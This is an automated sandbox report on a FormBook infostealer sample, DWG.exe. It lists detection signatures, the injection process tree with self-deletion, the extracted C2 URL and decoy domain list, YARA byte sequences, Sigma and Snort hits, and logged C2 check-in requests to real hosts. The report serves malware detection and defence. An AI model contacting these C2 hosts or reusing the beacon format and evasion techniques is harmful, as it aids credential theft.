Windows Analysis Report DWG.exe

Overview

General Information

Sample Name: DWG.exe
Analysis ID: 510733
MD5: ff882802d113ed02fa070c496f89d797
SHA1: aad1eed1c53f1d33ab52e13442b036bfeee91f1b
SHA256: 4216ff4fa7533209a6e50c6f05c5216b8afb456e6a3ab6b65ed9fcbdbd275096
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
System process connects to network (likely due to code injection or exploit)
Sigma detected: Suspect Svchost Activity
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Self deletion via cmd delete
Sigma detected: Suspicious Svchost Process
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Checks if the current process is being debugged
Potential key logger detected (key state polling based)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • DWG.exe (PID: 6272 cmdline: 'C:\Users\user\Desktop\DWG.exe' MD5: FF882802D113ED02FA070C496F89D797)
    • DWG.exe (PID: 6240 cmdline: C:\Users\user\Desktop\DWG.exe MD5: FF882802D113ED02FA070C496F89D797)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • svchost.exe (PID: 6564 cmdline: C:\Windows\SysWOW64\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
          • cmd.exe (PID: 6584 cmdline: /c del 'C:\Users\user\Desktop\DWG.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.elsist.online/xzes/"], "decoy": ["dent-works.com", "theravewizards.com", "venkataramanagraphics.com", "overway.store", "alignatura.com", "boggbogs.com", "senerants.tech", "muintel.net", "bestplacementconsultancy.com", "trippresso.com", "communication.services", "xn--maraaestudio-dhb.com", "beandhira.com", "lochnas.com", "update-mind.com", "cpcacursos.com", "metaverse-coaching.com", "skindefense5.com", "distressedthenblessed.com", "alphaore.com", "extrobility.com", "sandyanmax.com", "jntycy.com", "becomingalice.com", "printyourdays.com", "fallet-official.com", "hcbg.online", "era575.com", "dalainstitute.info", "7looks-mocha-totalbeauty.com", "spydasec.com", "vote4simone.net", "cannabeeswax.com", "coalitionloop.com", "skywalkerpressonline.com", "healthybalancedliving.com", "mylistg.com", "bookbqconspicuous.com", "mylyk.net", "mylindiss.com", "xn--80akukchh.xn--80asehdb", "captekbrasil.com", "joannhydeyoga.com", "monenee.xyz", "nishantmohapatra.com", "mindbodyweightlossmethod.com", "sxjcfw.com", "wilbertluna.com", "inclutel.com", "knowsyourdream.com", "uk-gaming.com", "maihengkeji.online", "fragrant-nest.com", "ubfodessa.com", "vipinindustries.com", "narcozland.com", "heros-coaching.com", "austeregomrqg.xyz", "eleonoritalia.com", "publiccoins.online", "dashmints.com", "thebrandstudiointernational.com", "thaikindee.com", "punkidz.com"]}

Yara Overview

Memory Dumps

Source / Rule / Description / Author / Strings
Source: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
Source: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Rule: Formbook, Description: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
  • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
  • 0x16bec:$sqlite3step: 68 34 1C 7B E1
  • 0x16b08:$sqlite3text: 68 38 2A 90 C5
  • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
  • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
Source: 00000005.00000000.329088160.0000000000401000.00000020.00020000.sdmp, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
Source: 00000005.00000000.329088160.0000000000401000.00000020.00020000.sdmp, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x7608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x79a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x136b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x131a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x137b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1392f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x83ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1241c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19c4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source / Rule / Description / Author / Strings
Source: 5.2.DWG.exe.400000.0.unpack, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
Source: 5.2.DWG.exe.400000.0.unpack, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 5.2.DWG.exe.400000.0.unpack, Rule: Formbook, Description: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
  • 0x15cd9:$sqlite3step: 68 34 1C 7B E1
  • 0x15dec:$sqlite3step: 68 34 1C 7B E1
  • 0x15d08:$sqlite3text: 68 38 2A 90 C5
  • 0x15e2d:$sqlite3text: 68 38 2A 90 C5
  • 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
Source: 5.0.DWG.exe.400000.1.unpack, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
Source: 5.0.DWG.exe.400000.1.unpack, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

System Summary:

Sigma detected: Suspect Svchost Activity
Source: Process started, Author: David Burkett, Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3352, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 6564
Sigma detected: Suspicious Svchost Process
Source: Process started, Author: Florian Roth, Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3352, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 6564
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process started, Author: vburov, Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3352, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 6564

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, Malware Configuration Extractor: FormBook (same configuration as listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: DWG.exe, Virustotal: Detection: 50%
Source: DWG.exe, ReversingLabs: Detection: 37%
Yara detected FormBook
Source: Yara match, File source: 5.2.DWG.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.0.DWG.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.0.DWG.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.0.DWG.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000000.329088160.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000A.00000002.556210414.0000000000A00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.378750031.00000000005C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.330081826.00000000007A6000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match, File source: 0000000A.00000002.556634388.0000000002E10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.378700564.0000000000430000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000000.348602608.000000000792F000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000000.363695053.000000000792F000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000000.329372667.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Antivirus / Scanner detection for submitted sample
Source: DWG.exe, Avira: detected
Machine Learning detection for sample
Source: DWG.exe, Joe Sandbox ML: detected
Source: 5.2.DWG.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 10.2.svchost.exe.900000.1.unpack, Avira: Label: TR/Patched.Gen
Source: 5.0.DWG.exe.400000.1.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.DWG.exe.400000.2.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 10.2.svchost.exe.3c3796c.4.unpack, Avira: Label: TR/Patched.Gen
Source: DWG.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: wntdll.pdbUGP, source: DWG.exe, 00000005.00000002.379687984.0000000000B6F000.00000040.00000001.sdmp, svchost.exe, 0000000A.00000002.557374731.000000000381F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb, source: DWG.exe, svchost.exe
Source: Binary string: svchost.pdb, source: DWG.exe, 00000005.00000002.378810891.000000000061A000.00000004.00000020.sdmp
Source: Binary string: svchost.pdbUGP, source: DWG.exe, 00000005.00000002.378810891.000000000061A000.00000004.00000020.sdmp
Source: C:\Users\user\Desktop\DWG.exe, Code function: 0_2_00436310 FindFirstFileA,GetDriveTypeA,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose, 0_2_00436310
Source: C:\Users\user\Desktop\DWG.exe, Code function: 0_2_00449B06 GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA, 0_2_00449B06
Source: C:\Users\user\Desktop\DWG.exe, Code function: 4x nop then pop edi, 5_2_0040C37A
Source: C:\Users\user\Desktop\DWG.exe, Code function: 4x nop then pop edi, 5_2_0040C3CA
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4x nop then pop edi, 10_2_02F1C3CA
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4x nop then pop edi, 10_2_02F1C37A

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49819 -> 198.54.116.195:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49819 -> 198.54.116.195:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49819 -> 198.54.116.195:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe, Domain query: www.hcbg.online
Source: C:\Windows\explorer.exe, Domain query: www.knowsyourdream.com
Source: C:\Windows\explorer.exe, Network Connect: 198.187.31.159 80
Source: C:\Windows\explorer.exe, Network Connect: 154.216.113.38 80
Source: C:\Windows\explorer.exe, Domain query: www.jntycy.com
Source: C:\Windows\explorer.exe, Domain query: www.publiccoins.online
Source: C:\Windows\explorer.exe, Domain query: www.theravewizards.com
Source: C:\Windows\explorer.exe, Domain query: www.thebrandstudiointernational.com
Source: C:\Windows\explorer.exe, Network Connect: 198.54.117.215 80
Source: C:\Windows\explorer.exe, Network Connect: 5.157.87.204 80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: www.elsist.online/xzes/
Source: Joe Sandbox View, ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
Source: Joe Sandbox View, ASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK POWERLINE-AS-APPOWERLINEDATACENTERHK
Source: global traffic, HTTP traffic detected: GET /xzes/?MnaP7J=3fjTHZDPJpAt&YTspi8lX=o99pRogLOIyRAntfhtpVZytcMadcCvcEAGz2+SNM9lt1Q6oIsfbH3zhNe5B/+1jhL6CE HTTP/1.1, Host: www.jntycy.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
Source: global traffic, HTTP traffic detected: GET /xzes/?MnaP7J=3fjTHZDPJpAt&YTspi8lX=VW6AQLcl+2136037Dei1g2cODa3ue2eSFsBods08HsyRy7QSHzNYTvvdstC8PYxoWiaB HTTP/1.1, Host: www.publiccoins.online, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
Source: global traffic, HTTP traffic detected: GET /xzes/?YTspi8lX=hHkh8CC3aQWSbWc+haxkrlzKrETBoK7eA41q+CP6m5nHXq5sq3R+TUUaF/2E5Ug81ukz&MnaP7J=3fjTHZDPJpAt HTTP/1.1, Host: www.thebrandstudiointernational.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
Source: global traffic, HTTP traffic detected: GET /xzes/?YTspi8lX=hsby6OIEBt/ghsMVYLSyJdZ7YeDc2IcIgsMuos52TKAPvq+RR5iGDOsuf8zypfzdpc18&MnaP7J=3fjTHZDPJpAt HTTP/1.1, Host: www.theravewizards.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
Source: Joe Sandbox View, IP Address: 198.187.31.159 198.187.31.159
Source: Joe Sandbox View, IP Address: 198.54.117.215 198.54.117.215
Source: svchost.exe, 0000000A.00000002.557764792.0000000003DB2000.00000004.00020000.sdmp, String found in binary or memory: http://push.zhanzhang.baidu.com/push.js
Source: explorer.exe, 00000006.00000000.367204188.000000000EEB1000.00000004.00000001.sdmp, String found in binary or memory: http://schemas.mi
Source: svchost.exe, 0000000A.00000002.557764792.0000000003DB2000.00000004.00020000.sdmp, String found in binary or memory: https://www.yourhosting.nl/parkeerpagina.html
Source: svchost.exe, 0000000A.00000002.557764792.0000000003DB2000.00000004.00020000.sdmp, String found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js
Source: unknown, DNS traffic detected: queries for: www.jntycy.com
Source: C:\Users\user\Desktop\DWG.exe, Code function: 0_2_00446387 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA, 0_2_00446387
Source: C:\Users\user\Desktop\DWG.exe, Code function: 0_2_00448BC4 GetKeyState,GetKeyState,GetKeyState,GetKeyState, 0_2_00448BC4

E-Banking Fraud:

Yara detected FormBook
Source: Yara match, File source: 5.2.DWG.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.0.DWG.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.0.DWG.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.0.DWG.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000000.329088160.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000A.00000002.556210414.0000000000A00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.378750031.00000000005C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.330081826.00000000007A6000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match, File source: 0000000A.00000002.556634388.0000000002E10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.378700564.0000000000430000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000000.348602608.000000000792F000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000000.363695053.000000000792F000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000000.329372667.0000000000401000.00000020.00020000.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 5.2.DWG.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.DWG.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 5.0.DWG.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.DWG.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 5.0.DWG.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.DWG.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 5.0.DWG.exe.400000.2.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.DWG.exe.400000.2.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.329088160.0000000000401000.00000020.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.329088160.0000000000401000.00000020.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.556210414.0000000000A00000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.556210414.0000000000A00000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.378750031.00000000005C0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.378750031.00000000005C0000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.330081826.00000000007A6000.00000004.00000020.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.330081826.00000000007A6000.00000004.00000020.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.556634388.0000000002E10000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.556634388.0000000002E10000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.378700564.0000000000430000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.378700564.0000000000430000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.348602608.000000000792F000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.348602608.000000000792F000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.363695053.000000000792F000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.363695053.000000000792F000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.329372667.0000000000401000.00000020.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.329372667.0000000000401000.00000020.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Source: DWG.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: 5.2.DWG.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.DWG.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.DWG.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.DWG.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.DWG.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.DWG.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.DWG.exe.400000.2.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.DWG.exe.400000.2.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
